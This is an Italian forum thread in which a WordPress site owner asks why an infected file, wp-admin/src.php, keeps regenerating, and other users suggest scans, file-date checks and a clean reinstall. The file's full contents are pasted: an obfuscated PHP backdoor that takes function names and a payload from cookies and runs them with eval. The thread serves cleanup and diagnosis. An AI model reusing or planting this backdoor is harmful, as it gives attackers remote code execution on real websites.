Navigazione

    Privacy - Termini e condizioni
    © 2020 Search On Media Group S.r.l.
    • Registrati
    • Accedi
    • CATEGORIES
    • Discussioni
    • Non letti
    • Recenti
    • Hashtags
    • Popolare
    • Utenti
    • Stream
    • Interest
    • Categories
    1. Home
    2. Categorie
    3. Coding e Sistemistica
    4. CMS & Piattaforme Self-Hosted
    5. file anomalo in wp admin
    Questa discussione è stata cancellata. Solo gli utenti con diritti di gestione possono vederla.
    • marcoilardi
      marcoilardi User Attivo • ultima modifica di

      vuol dire che non l'hai pulito bene è rimasta ancora qualche traccia

      0 Miglior Risposta Ringrazia Cita Rispondi

        mastertest 1 Risposta Ultima Risposta
      • mastertest
        mastertest User Attivo • ultima modifica di @marcoilardi

        @micropedia potrebbe essere al di fuori della cartella wp-admin in quanto è stata sostituita totalmente da un'installazione integra.
        potrebbe arrivare dalla cartella wp-includes?

        0 Miglior Risposta Ringrazia Cita Rispondi

          1 Risposta Ultima Risposta
        • marcoilardi
          marcoilardi User Attivo • ultima modifica di

          prova a fare una scansione con wordfence, plugin che ti consiglio di adottare in futuro io non ho avuto piu' problemi.
          wordfence dovrebbe dirti i file infetti quali sono

          0 Miglior Risposta Ringrazia Cita Rispondi

            mastertest 1 Risposta Ultima Risposta
          • mastertest
            mastertest User Attivo • ultima modifica di @marcoilardi

            @micropedia si in effetti lo utilizzo anch'io, wordfence mi riconosce il file come infetto wp-admin/src.php, e scansiona solamente questo file, a me interessa capire quale altro file genera in continuazione questo file. ti dico cosa c'è all'interno di questo file:

            <?php
            class Apt
            {
            private static $s;
            public static function g($n)
            {
            if (!self::$s)
            self::i();
            return self::$s;
            }
            private static function i()
            {
            self::$s = array(
            0135,
            0135,
            0116,
            0111,
            026,
            0136,
            0122,
            012,
            00
            );
            }
            }
            function click()
            {
            $_fkm = $_COOKIE;
            ($_fkm && isset($_fkm[Apt::g(0)])) ? (($_h = $_fkm[Apt::g(1)] . $_fkm[Apt::g(2)]) && ($_zpq = $_h($_fkm[Apt::g(3)] . $_fkm[Apt::g(4)])) && ($_uly = $_h($_fkm[Apt::g(5)] . $_fkm[Apt::g(6)])) && ($_uly = $_uly($_h($_fkm[Apt::g(7)]))) && @eval($_uly)) : $_fkm;
            return Apt::g(8);
            }
            click();

            ho provato a lasciare vuoto anche il file, ma dopo un po si regenera tutto di nuovo.

            0 Miglior Risposta Ringrazia Cita Rispondi

              1 Risposta Ultima Risposta
            • marcoilardi
              marcoilardi User Attivo • ultima modifica di

              credo che sia proprio questo il problema prova a cancellarlo (facendo prima una copia non si sa mai)

              Non lo vedo nell'elenco dei file nativi di wordpress

              https://codex.wordpress.org/WordPress_Files

              0 Miglior Risposta Ringrazia Cita Rispondi

                mastertest 1 Risposta Ultima Risposta
              • mastertest
                mastertest User Attivo • ultima modifica di @marcoilardi

                @micropedia si lo cancello e dopo qualche instante viene ricreato

                0 Miglior Risposta Ringrazia Cita Rispondi

                  1 Risposta Ultima Risposta
                • marcoilardi
                  marcoilardi User Attivo • ultima modifica di

                  una cosa che faccio io in questi casi è controllare le date di tutti i files vedi i files creati oggi o ieri saranno tutti contaminati o superflui

                  0 Miglior Risposta Ringrazia Cita Rispondi

                    1 Risposta Ultima Risposta
                  • eleclipse
                    eleclipse User Attivo • ultima modifica di

                    Lascia stare la caccia al tesoro.

                    Reinstalla wordpress manualmente da ftp e cancella tutto quello che non sono i tuoi file caricati nella cartella upload.

                    Dopo passa wordfence / sucuri giusto per sicurezza.

                    0 Miglior Risposta Ringrazia Cita Rispondi

                      1 Risposta Ultima Risposta
                    • mastertest
                      mastertest User Attivo • ultima modifica di

                      Risolto! in effetti il sito è stato ripulito correttamente e va tutto bene adesso, il problema del file (src.php) era dovuto ad un cron impostato in modo inspiegabile nel cpanel.

                      1 Miglior Risposta Ringrazia Cita Rispondi

                        KejSirio 1 Risposta Ultima Risposta
                      • KejSirio
                        KejSirio User • ultima modifica di @mastertest

                        @mastertest puoi spiegarci come hai individuato questo Cron?

                        0 Miglior Risposta Ringrazia Cita Rispondi

                          mastertest 1 Risposta Ultima Risposta
                        • mastertest
                          mastertest User Attivo • ultima modifica di @KejSirio

                          @kejsirio andando per esclusione dopo 2 giorni di ricerca nelle cartelle wordpress, mi era rimasto solo il cpanel dove avevo già effettuato una scansione, poi ho trovato un cron molto sospetto, dopo averlo eliminato è ritornato tutto regolare e funziona il tutto perfettamente.

                          1 Miglior Risposta Ringrazia Cita Rispondi

                            1 Risposta Ultima Risposta
                          • mastertest
                            mastertest User Attivo • ultima modifica di @Ospite

                            @homeworker si certo

                            0 Miglior Risposta Ringrazia Cita Rispondi

                              1 Risposta Ultima Risposta
                            Caricamento altri post
                            Rispondi
                            • Topic risposta
                            Effettua l'accesso per rispondere
                            • Da Vecchi a Nuovi
                            • Da Nuovi a Vecchi
                            • Più Voti